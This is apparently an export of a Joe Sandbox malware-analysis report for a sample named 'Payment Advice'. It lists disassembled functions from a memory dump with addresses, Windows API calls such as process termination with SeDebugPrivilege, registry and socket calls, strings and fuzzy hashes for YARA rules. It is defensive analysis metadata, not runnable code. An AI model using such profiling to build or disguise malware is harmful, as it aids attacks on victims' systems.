Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: c13dba4a96647d5acc3fe8250bdb674f96d906bf2caed4a4d6602fd6553f48d2
Instruction ID: 33234fa4b3866f44dd1d16930ca2696501ee3071cb051e12c5b93d4ac17db155
Opcode Fuzzy Hash: c13dba4a96647d5acc3fe8250bdb674f96d906bf2caed4a4d6602fd6553f48d2
Instruction Fuzzy Hash: 2F512DB2A0921D9EDF50EB94D885EDE77BCAF4C320B0044AEF605A3541EA7496C9CF64

Function 0059EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,005FDAD1,00000004,00000000,00000000), ref: 0059EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,005FDAD1,00000004,00000000,00000000), ref: 0059EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,005FDAD1,00000004,00000000,00000000), ref: 005FDC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,005FDAD1,00000004,00000000,00000000), ref: 005FDCF2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 0a89c5ef55ed2d66d3784b7e08680cfc39eac28ab7a03abab90a9b6119015af7
Instruction ID: 5246ab3f9eb10a71d6f31c9e686401127bad955e7b8ad6769e2aee28593eb87a
Opcode Fuzzy Hash: 0a89c5ef55ed2d66d3784b7e08680cfc39eac28ab7a03abab90a9b6119015af7
Instruction Fuzzy Hash: 9641D571215280DADF3ACB288D8FA7B7EA7BB46305F191C0DE28786565C775BC80D721

Function 005BB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,005BAEF1,00000B00,?,?), ref: 005BB26C
HeapAlloc.KERNEL32(00000000,?,005BAEF1,00000B00,?,?), ref: 005BB273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005BAEF1,00000B00,?,?), ref: 005BB288
GetCurrentProcess.KERNEL32(?,00000000,?,005BAEF1,00000B00,?,?), ref: 005BB290
DuplicateHandle.KERNEL32(00000000,?,005BAEF1,00000B00,?,?), ref: 005BB293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,005BAEF1,00000B00,?,?), ref: 005BB2A3
GetCurrentProcess.KERNEL32(005BAEF1,00000000,?,005BAEF1,00000B00,?,?), ref: 005BB2AB
DuplicateHandle.KERNEL32(00000000,?,005BAEF1,00000B00,?,?), ref: 005BB2AE
CreateThread.KERNEL32(00000000,00000000,005BB2D4,00000000,00000000,00000000), ref: 005BB2C8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: dc8737e33ebab68944e80f337c720be9e00af9a747b6b46364014a21f9ed607b
Instruction ID: 1ab20fffff13da80e4d0e2c95783f057db80126af2e9fbac94f1b730d5db7b77
Opcode Fuzzy Hash: dc8737e33ebab68944e80f337c720be9e00af9a747b6b46364014a21f9ed607b
Instruction Fuzzy Hash: C101CDB5280304BFE710AFA5DC4DF6B7BADEB89711F019551FA05DB1A1CAB59800CB61

Function 005DC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 005DC876, 005DC887
Not an Object type, xrefs: 005DC49E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: aea1aaf1ed1b6360a248fa687ca5be159ef3687ed4e69bda374105206983ebfc
Instruction ID: 19be41092c15a9d0b379cb930fbca05df957a88c5f5feba68e10a8b3689c85b0
Opcode Fuzzy Hash: aea1aaf1ed1b6360a248fa687ca5be159ef3687ed4e69bda374105206983ebfc
Instruction Fuzzy Hash: F4E18071A0021AABDF24DFA8D885AAE7FB5FF48314F14456BE905AB381D770ED41CB90

Function 005D16DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0058936C: __swprintf.LIBCMT ref: 005893AB
Part of subcall function 0058936C: __itow.LIBCMT ref: 005893DF

Part of subcall function 0059C6F4: _wcscpy.LIBCMT ref: 0059C717

_wcstok.LIBCMT ref: 005D184E
_wcscpy.LIBCMT ref: 005D18DD
_memset.LIBCMT ref: 005D1910

Strings

X, xrefs: 005D1948
p2cl2c, xrefs: 005D1920

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2cl2c
API String ID: 774024439-1497744008
Opcode ID: 2ddef1e27b91a4b5da84b00d3a1f8ed49bb9dc7583ccf27b2ba39e966c8f06ce
Instruction ID: 06009fc49c66ea81183fc09362c72abfb827e7ed9dd898908e12afc1a4c43071
Opcode Fuzzy Hash: 2ddef1e27b91a4b5da84b00d3a1f8ed49bb9dc7583ccf27b2ba39e966c8f06ce
Instruction Fuzzy Hash: 71C182355047429FC724EF68C855A5ABFE4BF85350F00492EF89A973A2DB30ED05CB96

Function 005E9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005E9B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 005E9B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005E9B47
_wcscat.LIBCMT ref: 005E9BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 005E9BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 005E9BE7

Strings

SysListView32, xrefs: 005E9AEB

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 3d21283ae726d7e48998424eb57c236f87c9fd88b476f305ea02caa15128e240
Instruction ID: b84a9c9de511b01bff60894f8541220e5c7d891a347198a6f365e8c48ba2c4f0
Opcode Fuzzy Hash: 3d21283ae726d7e48998424eb57c236f87c9fd88b476f305ea02caa15128e240
Instruction Fuzzy Hash: 2441D071940348ABDB259FA4DC89BEE7BB9FF08350F10052AF589E7292D7719D84CB60

Function 005E172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 005C6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005C6554
Part of subcall function 005C6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 005C6564
Part of subcall function 005C6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 005C65F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 005E179A
GetLastError.KERNEL32 ref: 005E17AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 005E17D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 005E1855
GetLastError.KERNEL32(00000000), ref: 005E1860
CloseHandle.KERNEL32(00000000), ref: 005E1895

Strings

SeDebugPrivilege, xrefs: 005E17B8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: b339a184493eed84b3f5b3d6ccd4fe64975c905eb6a98a63c9954d4cfe77624c
Instruction ID: f724bb11af05f089da82fc58d91082246c6f9b1e00d2eb83d87d4ed6e5639636
Opcode Fuzzy Hash: b339a184493eed84b3f5b3d6ccd4fe64975c905eb6a98a63c9954d4cfe77624c
Instruction Fuzzy Hash: B5419071600202AFDB09EF94C8A9F6E7BA6BF84710F04849CF9469F2C2DB74A900CB55

Function 005C5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 005C58B8

Strings

question, xrefs: 005C5871
blank, xrefs: 005C583A
info, xrefs: 005C5859
warning, xrefs: 005C58A1
stop, xrefs: 005C5889

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 209716a2fbdb1773b1d49004f75fc2051a62e354b86861bd27fcd71f4fc05fce
Instruction ID: 646182d8ebf2a6d3c8a8d52bc2cc77d5fc88b2fba0599dea67750234a9d7c5a6
Opcode Fuzzy Hash: 209716a2fbdb1773b1d49004f75fc2051a62e354b86861bd27fcd71f4fc05fce
Instruction Fuzzy Hash: 7411EB35209B53BEE7015AD49C82E6E2B9DBF16320F30003EF500F52C1F7A4BA8042A4

Function 005EA2C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0059D1BA
Part of subcall function 0059D17C: GetStockObject.GDI32(00000011), ref: 0059D1CE
Part of subcall function 0059D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0059D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 005EA32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 005EA33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 005EA345
SendMessageW.USER32(?,00000401,00000000,T.c), ref: 005EA354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 005EA360

Strings

Msctls_Progress32, xrefs: 005EA2FE
T.c, xrefs: 005EA347

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32$T.c
API String ID: 1025951953-3133994542
Opcode ID: 2a2e09f817229a87fab5fac8c4f62ec217b61986eda636896b4c47c21f6bcdd8
Instruction ID: a90cf4064db4982d0719fe819d9f31d44567dd8ee228d1b62c96c6731b59d232
Opcode Fuzzy Hash: 2a2e09f817229a87fab5fac8c4f62ec217b61986eda636896b4c47c21f6bcdd8
Instruction Fuzzy Hash: 991193B2150219BEEF155F61CC85EE77F6DFF09798F014115BA44A6060C672AC21DBA4

Function 005CA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 005CA806

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 4b06be5dd58c694ceddd6185db7fd5aef49cf37e6fad03d5fbac8626b1c5e77c
Instruction ID: 70e22fe350328b87970b017cd4c7dfdc5433ad522328e732a560661978fa9c3f
Opcode Fuzzy Hash: 4b06be5dd58c694ceddd6185db7fd5aef49cf37e6fad03d5fbac8626b1c5e77c
Instruction Fuzzy Hash: 78C15775A0021A9FDB00CF98D885BAEBFF4FF08319F20446EE606E7251D774AA41CB91

Function 005C6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 005C6B63
LoadStringW.USER32(00000000), ref: 005C6B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 005C6B80
LoadStringW.USER32(00000000), ref: 005C6B87
_wprintf.LIBCMT ref: 005C6BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 005C6BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 005C6BA8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 66380a1231d014a7f26ac124036e6124be477800fd7687a1e2a1015ac4362371
Instruction ID: 6ca883cabfa18e74b34417fb73b5cd0f802bc6665b58e560f88b9202c9084fb2
Opcode Fuzzy Hash: 66380a1231d014a7f26ac124036e6124be477800fd7687a1e2a1015ac4362371
Instruction Fuzzy Hash: 920131F6940218BFEB11ABE49D89EFB776DE708304F0055A5B746E2041EA749E848F74

Function 005E2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005E2BB5,?,?), ref: 005E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E2BF6

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 76ca1dd34f099da8fc225a7502ae11bf3f5a839704b3aef742fc4c6277bd41b2
Instruction ID: 978514fc9672f5c0a5f06bc34c54c136fce0c89367261cf2c1fbbd7831680ff7
Opcode Fuzzy Hash: 76ca1dd34f099da8fc225a7502ae11bf3f5a839704b3aef742fc4c6277bd41b2
Instruction Fuzzy Hash: 0B918B71604202AFCB05EF55C899B6EBBE9FF84310F04885DF99A97291DB30ED06CB42

Function 005D961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 005D9691
WSAGetLastError.WSOCK32(00000000), ref: 005D969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 005D96C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 005D96E9
WSAGetLastError.WSOCK32(00000000), ref: 005D96F8
inet_ntoa.WSOCK32(?), ref: 005D9765
htons.WSOCK32(?,?,?,00000000,?), ref: 005D97AA

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorLast$htonsinet_ntoaselect
String ID:
API String ID: 500251541-0
Opcode ID: 64b8b4732dbce12a970e43f0b0a0f2f69a60d0bd603694c3159fc17c728a3f32
Instruction ID: b1d5721ae69ec879dedf437507878ce459633e7dcbddec9fcae27e002740c922
Opcode Fuzzy Hash: 64b8b4732dbce12a970e43f0b0a0f2f69a60d0bd603694c3159fc17c728a3f32
Instruction Fuzzy Hash: 72719E71504242ABC724EF68CC89E6BBBE9FFC5714F104A1EF556A7291EB30D904CB62

Function 005AA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 005AA991

Part of subcall function 005A7D7C: __FF_MSGBANNER.LIBCMT ref: 005A7D91
Part of subcall function 005A7D7C: __NMSG_WRITE.LIBCMT ref: 005A7D98
Part of subcall function 005A7D7C: __malloc_crt.LIBCMT ref: 005A7DB8

__lock.LIBCMT ref: 005AA9A4
__lock.LIBCMT ref: 005AA9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00636DE0,00000018,005B5E7B,?,00000000,00000109), ref: 005AAA0C
EnterCriticalSection.KERNEL32(8000000C,00636DE0,00000018,005B5E7B,?,00000000,00000109), ref: 005AAA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 005AAA39

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 10ee5579eee38661098c853d8b99387bceb866a71e758f64beb41007eb371df0
Instruction ID: 35782821a6f127f9699bc5d8355c723a33583d649a82a680b0db15d51e0b33bc
Opcode Fuzzy Hash: 10ee5579eee38661098c853d8b99387bceb866a71e758f64beb41007eb371df0
Instruction Fuzzy Hash: D1414571A00616ABEB148FA8DA4475DBFF0BF47334F248318E525AB2D2D7749900CB92

Function 005E8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 005E8EE4
GetDC.USER32(00000000), ref: 005E8EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 005E8EF7
ReleaseDC.USER32(00000000,00000000), ref: 005E8F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 005E8F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 005E8F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,005EBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 005E8F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005E8FAA

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: e92b912f451034be107b4296ac0838657fa826cb2462c16b08a3fd46536c4423
Instruction ID: a11d674f473f103f16c7d5fddf4aefc13cd13109be76597ed67d2fc1792a4a35
Opcode Fuzzy Hash: e92b912f451034be107b4296ac0838657fa826cb2462c16b08a3fd46536c4423
Instruction Fuzzy Hash: 38317A72240214BFEB148F91CC4AFAB3FAAFB49715F084165FE499A191DAB69841CB70

Function 005F0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B34E: GetWindowLongW.USER32(?,000000EB), ref: 0059B35F

GetSystemMetrics.USER32(0000000F), ref: 005F016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 005F038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 005F03AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 005F03D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 005F03FF
ShowWindow.USER32(00000003,00000000), ref: 005F0421
DefDlgProcW.USER32(?,00000005,?,?), ref: 005F0440

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: c06c16af7e7107238ca3376c9f578b499a9b6960d6dfc4df27a796e32ba9ba01
Instruction ID: b77f97966d084af8379fba9409b73ea4b08232944c3c13df14b4cc1b6536f4b1
Opcode Fuzzy Hash: c06c16af7e7107238ca3376c9f578b499a9b6960d6dfc4df27a796e32ba9ba01
Instruction Fuzzy Hash: F3A1B03560061AEBDF18CF68C9897BEBBB2BF44700F089115EE549B2D1D738AD50CB90

Function 0059AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
